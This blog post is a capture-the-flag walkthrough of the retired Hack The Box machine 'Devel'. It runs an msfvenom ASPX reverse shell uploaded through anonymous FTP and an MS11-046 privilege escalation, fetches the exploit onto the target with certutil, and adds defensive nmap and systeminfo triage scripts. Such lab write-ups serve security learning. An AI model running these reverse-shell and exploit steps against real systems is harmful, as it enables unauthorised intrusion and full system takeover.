HTB Walkthrough: Devel w/o Metasploit (retired)

Shraddha M.
3 min read · Apr 14, 2021

Devel is a retired box on HTB and is part of TJ Null's list of OSCP-like boxes.

Hostname: Devel | Difficulty Level: Easy | Operating System: Windows

NMAP Scan

┌──(kali㉿kali)-[~/labs/HTB/Devel]
└─$ nmap -sC -sV -oA Devel 10.10.10.5
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-13 12:21 EDT
Nmap scan report for 10.10.10.5
Host is up (0.022s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17 02:06AM <DIR> aspnet_client
| 03-17-17 05:37PM 689 iisstart.htm
|_03-17-17 05:37PM 184946 welcome.png
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Ports 21 (FTP) and 80 (HTTP) are open.
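As an added example (it is not part of the original walkthrough and not a feature of nmap), the script below triages an nmap normal-output report for exactly the exposures this scan shows: anonymous FTP whose directory listing looks like an IIS web root, HTTP methods nmap marks as potentially risky, and the server header. The scan text embedded in it is a constructed sample taken from the output above; the severity labels and the list of web-root marker files are my own assumptions.

```python
"""Triage an nmap -sC -sV text report for the exposures seen on Devel.

Added example for this walkthrough; not part of the post or of nmap itself.
"""
import re

# Constructed sample: the port/script section of the scan shown above.
SAMPLE_SCAN = """\
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  02:06AM       <DIR>          aspnet_client
| 03-17-17  05:37PM                  689 iisstart.htm
|_03-17-17  05:37PM               184946 welcome.png
| ftp-syst:
|_  SYST: Windows_NT
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
# First line of an NSE script block: "| name: text" or "|_name:"; the
# listing and continuation lines start with a digit or with spaces instead.
SCRIPT_RE = re.compile(r"^([a-z][a-z0-9-]*):\s*(.*)$")
# Assumed marker files: if an FTP root contains these, it is probably the
# IIS web root, so an accepted upload becomes a served (and executable) file.
WEBROOT_MARKERS = {"iisstart.htm", "aspnet_client", "default.aspx", "web.config"}


def parse_ports(report):
    """Return {port: {state, service, version, scripts: {name: [lines]}}}."""
    ports, current, script = {}, None, None
    for line in report.splitlines():
        m = PORT_RE.match(line)
        if m:
            port = int(m.group(1))
            current = ports[port] = {"state": m.group(3), "service": m.group(4),
                                     "version": m.group(5).strip(), "scripts": {}}
            script = None
            continue
        if current is None or not line.startswith("|"):
            continue
        body = line[2:]  # drop the "| " or "|_" prefix nmap puts on script output
        s = SCRIPT_RE.match(body)
        if s:
            script = s.group(1)
            current["scripts"][script] = [s.group(2)] if s.group(2) else []
        elif script is not None:
            current["scripts"][script].append(body.strip())
    return ports


def triage(report):
    """Return a list of (port, severity, note) findings, lowest port first."""
    findings = []
    for port, info in sorted(parse_ports(report).items()):
        scripts = info["scripts"]
        anon = scripts.get("ftp-anon", [])
        if anon and "login allowed" in anon[0].lower():
            # Remaining ftp-anon lines are the directory listing; the file
            # name is the last whitespace-separated field of each line.
            names = {l.split()[-1] for l in anon[1:] if l.split()}
            hits = sorted(names & WEBROOT_MARKERS)
            note = "anonymous FTP login allowed; check whether uploads are accepted"
            if hits:
                note += "; listing looks like an IIS web root (%s)" % ", ".join(hits)
            findings.append((port, "HIGH" if hits else "MEDIUM", note))
        for l in scripts.get("http-methods", []):
            if "potentially risky" in l.lower():
                findings.append((port, "LOW", l))
        header = scripts.get("http-server-header")
        if header:
            findings.append((port, "INFO", "server header: " + header[0]))
    return findings


if __name__ == "__main__":
    for port, severity, note in triage(SAMPLE_SCAN):
        print("%5d  %-6s %s" % (port, severity, note))
```

The FTP finding is rated HIGH only when the listing contains web-root markers, because anonymous read access on its own is a much smaller problem than an FTP root that doubles as the IIS document root; the next section confirms that combination by uploading a file and fetching it over HTTP.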

Enumeration

Since anonymous login is allowed, enter anonymous as the username and leave the password blank.
┌──(kali㉿kali)-[~/labs/HTB/Devel]
└─$ ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in
ftp> put test.html
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
03-18-17 02:06AM <DIR> aspnet_client
03-17-17 05:37PM 689 iisstart.htm
04-14-21 12:55AM 38 test.html
03-17-17 05:37PM 184946 welcome.png

┌──(kali㉿kali)-[~/labs/HTB/Devel]
└─$ cat test.html
<html><body>Hello dude</body></html>

Now browse to http://10.10.10.5/test.html and you will see 'Hello dude'. This confirms that files uploaded over FTP land in the IIS web root and are served by the web server.

Exploitation

IIS typically executes ASP or ASPX (ASP.NET) pages. Generate an ASPX reverse shell:
┌──(kali㉿kali)-[~/labs/HTB/Devel]
└─$ msfvenom -p windows/shell_reverse_tcp -f aspx LHOST=10.10.14.14 LPORT=9876 -o reverse-shell.aspx

Upload the generated reverse shell to the FTP server, and open a netcat listener on port 9876 in another tab of your Kali machine.

ftp> put reverse-shell.aspx
local: reverse-shell.aspx remote: reverse-shell.aspx
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
2752 bytes sent in 0.00 secs (11.4109 MB/s)
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
03-18-17 02:06AM <DIR> aspnet_client
03-17-17 05:37PM 689 iisstart.htm
04-14-21 01:47AM 2752 reverse-shell.aspx
03-17-17 05:37PM 184946 welcome.png

Browse to http://10.10.10.5/reverse-shell.aspx and the listener receives a reverse shell. The shell runs as the IIS application pool identity, which cannot read the profiles of babis or Administrator, so we need to escalate to user babis, whose profile probably holds the user flag.

c:\windows\system32\inetsrv>whoami
whoami
iis apppool\web
c:\Users>cd babis
cd babis
Access is denied.

c:\Users>cd Administrator
cd Administrator
Access is denied.

Privilege Escalation

Enumerate the OS with the command below:
c:\Users>systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
OS Name: Microsoft Windows 7 Enterprise
OS Version: 6.1.7600 N/A Build 7600

The full 'systeminfo' output reports 'Hotfix(s): N/A', so the box has no patches installed and is a likely candidate for a kernel exploit. A Google search for 'kernel exploit windows 7 build 7600' turns up https://github.com/abatchy17/WindowsExploits/blob/master/MS11-046/40564.c, which points to the machine being vulnerable to MS11-046.
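As an added example (not part of the original walkthrough), the script below turns the two facts this paragraph relies on, the OS build number and the hotfix list, into a patch-level check that can be run over saved 'systeminfo' output. It flags a Windows 7 install that is still at the RTM build 7600 (Service Pack 1 is build 7601) and one that reports no hotfixes at all, which is the state that leaves every post-release kernel and driver fix missing. Both 'systeminfo' transcripts are constructed samples: the first mirrors the values shown above, the second is an invented patched host whose KB numbers are placeholders.

```python
"""Check saved 'systeminfo' output for an unpatched Windows 7 build.

Added example for this walkthrough; not part of the post or of Windows.
"""
import re

# Constructed sample modelled on the Devel output above (no hotfixes).
SAMPLE_SYSTEMINFO = """\
Host Name:                 DEVEL
OS Name:                   Microsoft Windows 7 Enterprise
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
System Type:               X86-based PC
Hotfix(s):                 N/A
"""

# Constructed sample of a patched host; the KB numbers are placeholders.
SAMPLE_PATCHED = """\
Host Name:                 LABWS01
OS Name:                   Microsoft Windows 7 Enterprise
OS Version:                6.1.7601 Service Pack 1 Build 7601
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB0000001
                           [02]: KB0000002
"""

KB_RE = re.compile(r"\[\d+\]:\s*(KB\d+)")
BUILD_RE = re.compile(r"Build (\d+)")


def parse_systeminfo(text):
    """Return {os, version, build, hotfixes} from 'systeminfo' text."""
    fields, hotfixes = {}, []
    for line in text.splitlines():
        kb = KB_RE.search(line)
        if kb:  # indented "[01]: KBnnnnnn" lines under Hotfix(s)
            hotfixes.append(kb.group(1))
            continue
        if ":" in line and not line.startswith(" "):
            key, _, value = line.partition(":")
            fields[key.strip()] = value.strip()
    build = BUILD_RE.search(fields.get("OS Version", ""))
    return {
        "os": fields.get("OS Name", ""),
        "version": fields.get("OS Version", ""),
        "build": int(build.group(1)) if build else None,
        "hotfixes": hotfixes,
    }


def assess(info):
    """Return a list of patch-level problems; empty means nothing flagged."""
    issues = []
    if "Windows 7" in info["os"] and info["build"] == 7600:
        issues.append("Windows 7 RTM (build 7600): Service Pack 1 (build 7601) not applied")
    if not info["hotfixes"]:
        issues.append("no hotfixes installed: every post-release kernel and driver fix is missing")
    return issues


if __name__ == "__main__":
    for sample in (SAMPLE_SYSTEMINFO, SAMPLE_PATCHED):
        info = parse_systeminfo(sample)
        print(info["os"], info["version"])
        for issue in assess(info) or ["no issues flagged"]:
            print("  -", issue)
```

The check is deliberately coarse: it does not map build numbers to individual bulletins, it only separates "never patched" from "patched at some point", which is the distinction the walkthrough draws from 'Hotfix(s): N/A'. The remediation on the defending side is the same either way: apply SP1 and the cumulative updates, and do not run an internet-facing IIS host on an RTM build.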

We can find the same exploit in searchsploit.
┌──(kali㉿kali)-[~/labs/HTB/Devel]
└─$ searchsploit ms11-046
Exploit title: Microsoft Windows (x86) - 'afd.sys' Local Privilege Escalation (MS11-046)
┌──(kali㉿kali)-[~/labs/HTB/Devel]
└─$ searchsploit -m windows_x86/local/40564.c

Rename the exploit to priv.c. To cross-compile priv.c for Windows we need mingw-w64.
Install mingw-w64:
(a) sudo apt-get update
(b) sudo apt-get install mingw-w64

Refer this site for exploitation: https://vk9-sec.com/microsoft-windows-x86-afd-sys-local-privilege-escalation-ms11-046-2011-1249/
┌──(kali㉿kali)-[~/labs/HTB/Devel]
└─$ i686-w64-mingw32-gcc priv.c -o MS11-046.exe -lws2_32
┌──(kali㉿kali)-[~/labs/HTB/Devel]
└─$ chmod +x MS11-046.exe

Transfer the file to the target machine.
On Kali: python -m SimpleHTTPServer (serves the current directory on port 8000)
On the target:
(a) cd %temp%
(b) certutil -urlcache -f http://10.10.14.14:8000/MS11-046.exe exploit.exe

Run the exploit; it returns a shell as SYSTEM.
C:\Windows\Temp>exploit.exe
exploit.exe

c:\Windows\System32>whoami
whoami
nt authority\system
With SYSTEM privileges, both the user and root flags can now be read.
